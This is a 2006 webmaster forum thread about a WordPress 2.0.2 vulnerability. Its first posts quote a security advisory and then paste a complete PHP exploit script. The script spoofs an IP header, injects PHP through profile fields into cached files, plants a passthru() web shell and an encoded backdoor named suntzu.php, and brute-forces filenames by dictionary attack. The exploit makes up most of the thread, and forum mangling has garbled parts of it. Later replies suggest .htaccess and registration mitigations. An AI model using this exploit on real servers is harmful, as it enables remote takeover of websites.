Wordpress exploit details - GoFuckYourself.com

SmokeyTheBear · 05-26-2006, 10:45 PM

posted a thread earlier but didnt have any info to go along with it.. so heres the further details

Advisory ID : FrSIRT/ADV-2006-1992
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-05-26

Technical Description

A vulnerability has been identified in WordPress, which may be exploited by attackers to compromise a vulnerable web server. This flaw is due to input validation errors in the "wp-admin/profile.php" script that does not validate certain parameters before being written to PHP scripts in the "wp-content/cache/userlogins/" and "wp-content/cache/users/" directories, which could be exploited by malicious users to inject and execute arbitrary PHP code with the privileges of the web server.

Note : An input validation error in the "vars.php" script when handling the "PC_REMOTE_ADDR" HTTP header could be exploited by attackers to spoof their IP addresses.

Affected Products

WordPress version 2.0.2 and prior

Solution

The FrSIRT is not aware of any official supplied patch for this issue.

Jace · 05-26-2006, 10:49 PM

wonder how long it will take to get a fix for it

SmokeyTheBear · 05-26-2006, 10:49 PM

heres how they do it

Code:

#!/usr/bin/php -q -d short_open_tag=on
<?


if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS             \r\n";
echo "host:      target server (ip/hostname)                              \r\n";
echo "path:      path to WordPress                                        \r\n";
echo "cmd:       a shell command                                          \r\n";
echo "user/pass: you need a valid user account                            \r\n";
echo "Options:                                                            \r\n";
echo "   -D[dicrionary] specify a textfile and try dictionary attack      \r\n";
echo "   -p[port]:        \"  a port other than 80                        \r\n";
echo "   -P[ip:port]:     \"  a proxy                                     \r\n";
echo "Examples:                                                           \r\n";
echo "php ".$argv[0]." localhost /wordpress/ your_username password ls -la -Ddic.txt\r\n";
echo "php ".$argv[0]." localhost /wordpress/ your_username password cat ./../../../wp-config.php -p81\r\n";
echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
die;
}

/* explaination:

  i) wordpress stores some user informations inside cached files
   in wp-content/cache/userlogins/ and wp-content/cache/users/ folders, they are
   php files.
   Normally they look like this:

   <?php
   //O:8:"stdClass":23:{s:2:"ID";s:3:"106";s:10:"user_login";s:6:"suntzu";s:9:"user_pass";s:32:"a2b0f31cd94e749b58307775462e2e4b";s:13:"user_nicename";s:6:"suntzu";s:10:"user_email";s:18:"[email protected]";s:8:"user_url";s:0:"";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:6:"suntzu";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:8:"nickname";s:6:"suntzu";s:11:"description";s:0:"";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:15:"wp_capabilities";a:1:{s:10:"subscriber";b:1;}s:13:"wp_user_level";s:1:"0";s:10:"user_level";s:1:"0";s:14:"user_firstname";s:0:"";s:13:"user_lastname";s:0:"";s:16:"user_description";s:0:"";}
   ?>

   but...what happens if you inject a carriage return ( chr(13)...), some php code and some
   escape chars when you update your profile (ex. in "displayname" argument)?

   Look at this file now:

   <?php
   //O:8:"stdClass":24:{s:2:"ID";s:3:"106";s:10:"user_login";s:6:"suntzu";s:9:"user_pass";s:32:"a2b0f31cd94e749b58307775462e2e4b";s:13:"user_nicename";s:6:"suntzu";s:10:"user_email";s:17:"[email protected]";s:8:"user_url";s:7:"http://";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:185:"suntzu
   error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){$_REQUEST[cmd]=stripslashes($_REQUEST[cmd]);}echo 56789;passthru($_REQUEST[cmd]);echo 56789;//suntzuuuuuuuuuuuuuu";s:10:"first_name";s:6:"suntzu";s:9:"last_name";s:6:"suntzu";s:8:"nickname";s:6:"suntzu";s:11:"description";s:6:"whoami";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:15:"wp_capabilities";a:1:{s:10:"subscriber";b:1;}s:13:"wp_user_level";s:1:"0";s:10:"user_level";s:1:"0";s:12:"rich_editing";s:4:"true";s:14:"user_firstname";s:6:"suntzu";s:13:"user_lastname";s:6:"suntzu";s:16:"user_description";s:6:"whoami";}
   ?>

   you have a backdoor on target server...

   Now you have to search a way to guess filenames 'cause we have an
   index.php to trivially protect folders, but... guess what?

   give a look at wp-includes/cache.php at line 355:

   ...
   $cache_file = $group_dir.md5($id.DB_PASSWORD).'.php';
   ...

   $group_dir is the folder where files are stored
   DB_PASSWORD costant could be empty, if so...
   you have only to calculate the md5 hash of your user id, then:

   http://[target]/[path]/wp-content/cache/users/[md5(user_id)].php?cmd=ls%20-la

   the same with userlogins/ folder, this time:

   http://[target]/[path]/wp-content/cache/userlogins/[md5(username)].php?cmd=ls%20-la

   otherwise you can check if DB_PASSWORD is in a dictionary through the -D option,
   this tool calculate the hash to do something like this:

   http://[target]/[path]/wp-content/cache/users/[md5([user_id][db_pass])].php?cmd=ls%20-la
   http://[target]/[path]/wp-content/cache/userloginss/[md5([username][db_pass])].php?cmd=ls%20-la

  ii) an ip-spoofing issue in vars.php:

  ...
  // On OS X Server, $_SERVER['REMOTE_ADDR'] is the server's address. Workaround this
  // by using $_SERVER['HTTP_PC_REMOTE_ADDR'], which *is* the remote address.
  if ( isset($_SERVER['HTTP_PC_REMOTE_ADDR']) )
  	$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_PC_REMOTE_ADDR'];
  ...

  poc:
  you can set an http header like this when you register:

  PC_REMOTE_ADDR: 1.1.1.1
									      */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))hahahaha2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($conthahahaha15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxyhahahaha'') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxyhahahaha'') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;

}
$host=$argv[1];
$path=$argv[2];
$username=$argv[3];
$password=$argv[4];
$cmd="";
$port=80;
$proxy="";
$dict="";

for ($i=5; $i<=$argc-1; $i++){
$t=$argv[$i][0].$argv[$i][1];
if (($t<>"-p") and ($t<>"-P") and ($t<>"-D"))
{$cmd.=" ".$argv[$i];}
if ($thahahaha"-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($thahahaha"-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($thahahaha"-D")
{
  $dict=str_replace("-D","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxyhahahaha'') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "step 0 -> check if suntzu.php is already installed...\r\n";
$check=array("users/suntzu.php",
	     "userlogins/suntzu.php"
	     );

SmokeyTheBear · 05-26-2006, 10:49 PM

[code]

Code:

for ($i=0; $i<=count($check)-1; $i++)
{
  $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Cookie: cmd=".$cmd."\r\n";
  $packet.="Connection: close\r\n\r\n";
  sendpacketii($packet);
  if (strstr($html,"*DL*"))
  {
    echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo $temp[1]."\r\n";echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la";die;
  }
}
echo "step 1 -> Login ...\r\n";
$data="log=".urlencode(trim($username));
$data.="&pwd=".urlencode(trim($password));
$data.="&rememberme=forever";
$data.="&submit=".urlencode("Login &raquo;");
$data.="&redirect_to=wp-admin";
$packet="POST ".$p."wp-login.php HTTP/1.0\r\n";
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n"; //ip spoofing bug in vars.php ;)...
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);
$cookie=$temp2[0];
$temp2=explode(" ",$temp[2]);
$cookie.=" ".$temp2[0];
if ($cookiehahahaha''){echo "Unable to login...";die;}
else {echo "cookie ->".$cookie."\r\n";}

echo "step 2 -> Retrieve your user id...\r\n";
$packet="GET ".$p."wp-admin/profile.php HTTP/1.0\r\n";
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("checkuser_id\" value=\"",$html);
$temp2=explode("\"",$temp[1]);
$user_id=$temp2[0];
if ($user_idhahahaha''){die("Unable to retrieve user id...\r\n");}
else {echo "user id -> ".$user_id."\r\n";}

echo "step 3 -> Update your profile with the evil code...\r\n";
$suntzu='$fp=fopen("suntzu.php","w");fputs($fp,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(114).chr(114).chr(111).chr(114).chr(95).chr(114).chr(101).chr(112).chr(111).chr(114).chr(116).chr(105).chr(110).chr(103).chr(40).chr(48).chr(41).chr(59).chr(115).chr(101).chr(116).chr(95).chr(116).chr(105).chr(109).chr(101).chr(95).chr(108).chr(105).chr(109).chr(105).chr(116).chr(40).chr(48).chr(41).chr(59).chr(105).chr(102).chr(32).chr(40).chr(103).chr(101).chr(116).chr(95).chr(109).chr(97).chr(103).chr(105).chr(99).chr(95).chr(113).chr(117).chr(111).chr(116).chr(101).chr(115).chr(95).chr(103).chr(112).chr(99).chr(40).chr(41).chr(41).chr(123).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(61).chr(115).chr(116).chr(114).chr(105).chr(112).chr(115).chr(108).chr(97).chr(115).chr(104).chr(101).chr(115).chr(40).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(125).chr(101).chr(99).chr(104).chr(111).chr(32).chr(34).chr(42).chr(68).chr(76).chr(42).chr(34).chr(59).chr(112).chr(97).chr(115).chr(115).chr(116).chr(104).chr(114).chr(117).chr(40).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62));fclose($fp);//';
$suntzu=urlencode($suntzu);
$code='error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){$_REQUEST[cmd]=stripslashes($_REQUEST[cmd]);}echo chr(42).chr(68).chr(76).chr(42);passthru($_REQUEST[cmd]);echo chr(42).chr(68).chr(76).chr(42);';
$code=urlencode($code);
$data="from=profile";
$data.="&checkuser_id=".$user_id;
$data.="&user_login=".urlencode(trim($username));
$data.="&first_name=".urlencode(trim($username));
$data.="&last_name=".urlencode(trim($username)).chr(13).$suntzu."//suntzuuu";
$data.="&nickname=".urlencode(trim($username));
$data.="&display_name=".urlencode(trim($username)).chr(13).$code."//suntzuu";
$data.="&email=".urlencode("[email protected]");
$data.="&url=".urlencode("http://");
$data.="&aim=";
$data.="&yim=";
$data.="&jabber=";
$data.="&description=whoami";
$data.="&rich_editing=true";
$data.="&submit=".urlencode("Update Profile &raquo;");
$packet="POST ".$p."wp-admin/profile-update.php HTTP/1.0\r\n";
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Referer: http://".$host.$path."wp-admin/profile-update.php\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("updated=true",$html)){echo "Done...\r\n";}
else {die("Unable to update profile...");}

echo "step 4 -> go to profile page to avoid cached files deletion...\r\n";
$packet="GET ".$p."wp-admin/profile.php?updated=true HTTP/1.0\r\n";
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacketii($packet);
if (eregi("200 OK",$html)){echo "Done...\r\n";}
sleep(2);

echo "step 5 -> check for an empty db password...\r\n";
$check=array("users/".md5($user_id).".php",
	     "userlogins/".md5(trim($username)).".php"
	     );
for ($i=0; $i<=count($check)-1; $i++)
{
  $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Cookie: cmd=".$cmd."\r\n";
  $packet.="Connection: close\r\n\r\n";
  sendpacketii($packet);
  if (eregi("*DL*",$html))
  {
    echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo($temp[1]);echo"\r\nNow you can launch commands through the followig urls:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";die;
  }
}

if ($dicthahahaha'') {echo "exploit failed...\r\n";}
else
   {
    echo "step 6 -> trying with dictionary attack...\r\n";
    if (file_exists($dict))
    {
      $fp=fopen($dict,"r");
      while (!feof($fp))
      {
        $word=trim(fgets($fp));
        $check=array("users/".md5($user_id.$word).".php",
	             "userlogins/".md5(trim($username).$word).".php"
	            );
        for ($i=0; $i<=count($check)-1; $i++)
        {
	  echo "Trying with ".$check[$i]."\r\n";
          $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Cookie: cmd=".$cmd."\r\n";
          $packet.="Connection: close\r\n\r\n";
          sendpacketii($packet);
          if (strstr($html,"*DL*"))
          {
            echo "Exploit succeeded...\r\n";fclose($fp);$temp=explode("*DL*",$html);echo $temp[1];echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";
	    die;
          }
        }
     }
     fclose($fp);
     //if you are here...
     echo "Exploit failed...\r\n";
   }
   else
   {
     die($dict."does not exist!");
   }
  }
?>

2HousePlague · 05-26-2006, 10:50 PM

Smokey be praised!

2hp

OzMan · 05-26-2006, 10:54 PM

tank u ser

2HousePlague · 05-26-2006, 10:56 PM

Smokey, she's just fer you!

2hp

OzMan · 05-26-2006, 11:08 PM

Until a patch comes out the only thing I can think of off the top of my head would be to restrict web access to the wp-content/cache/userlogins/ and wp-content/cache/users/ directories with .htaccess.

Splum · 05-26-2006, 11:08 PM

Smokey where did you get this info from if you dont mind me asking

baddog · 05-26-2006, 11:18 PM

STB, I wouldn't mind talking to you on ICQ if you have a chance

SmokeyTheBear · 05-26-2006, 11:20 PM

Quote:

Originally Posted by Splum

Smokey where did you get this info from if you dont mind me asking

frsirt....

Splum · 05-26-2006, 11:24 PM

Hmm trying to exploit myself and its not working, did GFY fuck up the code or something STB?

SmokeyTheBear · 05-26-2006, 11:28 PM

Quote:

Originally Posted by Splum

Hmm trying to exploit myself and its not working, did GFY fuck up the code or something STB?

yup it did

http://retrogod.altervista.org/wordpress_202_xpl.html

Splum · 05-26-2006, 11:28 PM

Heh nevermind I found the exploit

Good thing none of my sites RUN wordpress.

soulboy · 05-26-2006, 11:29 PM

Thanks a lot for the information

2HousePlague · 05-26-2006, 11:30 PM

Quote:

Originally Posted by baddog

STB, I wouldn't mind talking to you on ICQ if you have a chance

Dogs & Bears have a long, rich history of working well together! Especially ion Japan --

2hp

SmokeyTheBear · 05-26-2006, 11:32 PM

Quote:

Originally Posted by 2HousePlague

Dogs & Bears have a long, rich history of working well together! Especially ion Japan --

2hp

romans also liked them together..

$5 submissions · 05-26-2006, 11:43 PM

Good thing I don't use WP. That's raw....

Chio The Pirate · 05-27-2006, 12:01 AM

Quote:

/*
this works:
regardless of all php.ini settings,
***********if user registration is enabled,**************
against an empty or weak MySQL DB password (read explaination for details...)
*/

Disable user registration.

Chio The Pirate · 05-27-2006, 12:07 AM

Should prolly rename profile.php as well in the wp-admin folder.

mrkris · 05-27-2006, 10:24 AM

Quote:

Originally Posted by Chio The Pirate

Disable user registration.

yup, and if you don't have a db password set, then you deserve to be smacked with this exploit ...

nico-t · 05-27-2006, 10:29 AM

crazy... good that i got user registartions disabled on my blogs. This means the virus cant touch me right?

Corona · 05-27-2006, 11:30 AM

Quote:

Originally Posted by Splum

Heh nevermind I found the exploit

Good thing none of my sites RUN wordpress.

It's not just WordPress that has the problem. I got it on a site that only has phpadsnew and links 2.0 on it. Other have got it from trade scritps.

Brujah · 05-27-2006, 12:23 PM

Block your wp-admin directory with .htaccess
Deny from All
Allow from your IP

You really should do this anyway

05-26-2006, 10:45 PM	#1
SmokeyTheBear ►SouthOfHeaven Join Date: Jun 2004 Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer Posts: 28,609	Wordpress exploit details posted a thread earlier but didnt have any info to go along with it.. so heres the further details Advisory ID : FrSIRT/ADV-2006-1992 CVE ID : GENERIC-MAP-NOMATCH Rated as : High Risk Remotely Exploitable : Yes Locally Exploitable : Yes Release Date : 2006-05-26 Technical Description A vulnerability has been identified in WordPress, which may be exploited by attackers to compromise a vulnerable web server. This flaw is due to input validation errors in the "wp-admin/profile.php" script that does not validate certain parameters before being written to PHP scripts in the "wp-content/cache/userlogins/" and "wp-content/cache/users/" directories, which could be exploited by malicious users to inject and execute arbitrary PHP code with the privileges of the web server. Note : An input validation error in the "vars.php" script when handling the "PC_REMOTE_ADDR" HTTP header could be exploited by attackers to spoof their IP addresses. Affected Products WordPress version 2.0.2 and prior Solution The FrSIRT is not aware of any official supplied patch for this issue. __________________ hatisblack at yahoo.com

05-26-2006, 10:50 PM	#5
2HousePlague CURATOR Join Date: Jul 2004 Location: the attic Posts: 14,572	Smokey be praised! 2hp __________________ tada!

05-26-2006, 10:56 PM	#7
2HousePlague CURATOR Join Date: Jul 2004 Location: the attic Posts: 14,572	Smokey, she's just fer you! 2hp __________________ tada!

05-26-2006, 11:08 PM	#8
OzMan Confirmed User Join Date: Sep 2003 Location: Los Begas Posts: 9,162	Until a patch comes out the only thing I can think of off the top of my head would be to restrict web access to the wp-content/cache/userlogins/ and wp-content/cache/users/ directories with .htaccess. Last edited by OzMan; 05-26-2006 at 11:09 PM..

05-26-2006, 11:29 PM	#15
soulboy Confirmed User Join Date: Apr 2004 Posts: 663	Thanks a lot for the information __________________ 500GB + 5TB BW @ $5.95 \| LEarn how to generate 1 MILLION of hits \| Increase your PR - Best SEO Software

05-26-2006, 10:49 PM	#2
Jace FBOP Class Of 2013 Industry Role: Join Date: Jan 2004 Location: bumfuck, ky Posts: 35,562	wonder how long it will take to get a fix for it

05-26-2006, 10:54 PM	#6
OzMan Confirmed User Join Date: Sep 2003 Location: Los Begas Posts: 9,162	tank u ser

05-26-2006, 11:08 PM	#9
Splum Confirmed User Join Date: May 2003 Location: USA Posts: 6,195	Smokey where did you get this info from if you dont mind me asking

05-26-2006, 11:18 PM	#10
baddog So Fucking Banned Industry Role: Join Date: Apr 2001 Location: the beach, SoCal Posts: 107,089	STB, I wouldn't mind talking to you on ICQ if you have a chance

05-26-2006, 11:24 PM	#12
Splum Confirmed User Join Date: May 2003 Location: USA Posts: 6,195	Hmm trying to exploit myself and its not working, did GFY fuck up the code or something STB?

05-26-2006, 11:28 PM	#14
Splum Confirmed User Join Date: May 2003 Location: USA Posts: 6,195	Heh nevermind I found the exploit Good thing none of my sites RUN wordpress.

05-26-2006, 11:43 PM	#18
$5 submissions I help you SUCCEED Industry Role: Join Date: Nov 2003 Location: The Pearl of the Orient Seas Posts: 32,195	Good thing I don't use WP. That's raw.... __________________ Need a NON-ADULT income stream? We build your YOUTUBE CHANNEL for only $20 per video! For Hire: $3/hour or $400 per month Marketing Specialist Virtual Assistants

05-27-2006, 12:07 AM	#20
Chio The Pirate Confirmed User Join Date: Oct 2002 Location: YARGH! On me big sailboat with the skull flags * * ICQ: 39-183769 Posts: 946	Should prolly rename profile.php as well in the wp-admin folder. __________________ Need to get a site indexed in a few days? Want thousands of targeted, quality hits to your site? Want to beta test something that will revolutionize the way companies, and individuals advertise online.? Click here to take a look at Bliggo

05-27-2006, 10:29 AM	#22
nico-t emperor of my world Join Date: Aug 2004 Location: nethalands Posts: 29,903	crazy... good that i got user registartions disabled on my blogs. This means the virus cant touch me right?

05-27-2006, 12:23 PM	#24
Brujah Beer Money Baron Industry Role: Join Date: Jan 2001 Location: brujah / gmail Posts: 22,157	Block your wp-admin directory with .htaccess Deny from All Allow from your IP You really should do this anyway __________________ Free Premium Domain Lists and Tools at Clickmojo.com For Sale: Obscenity.com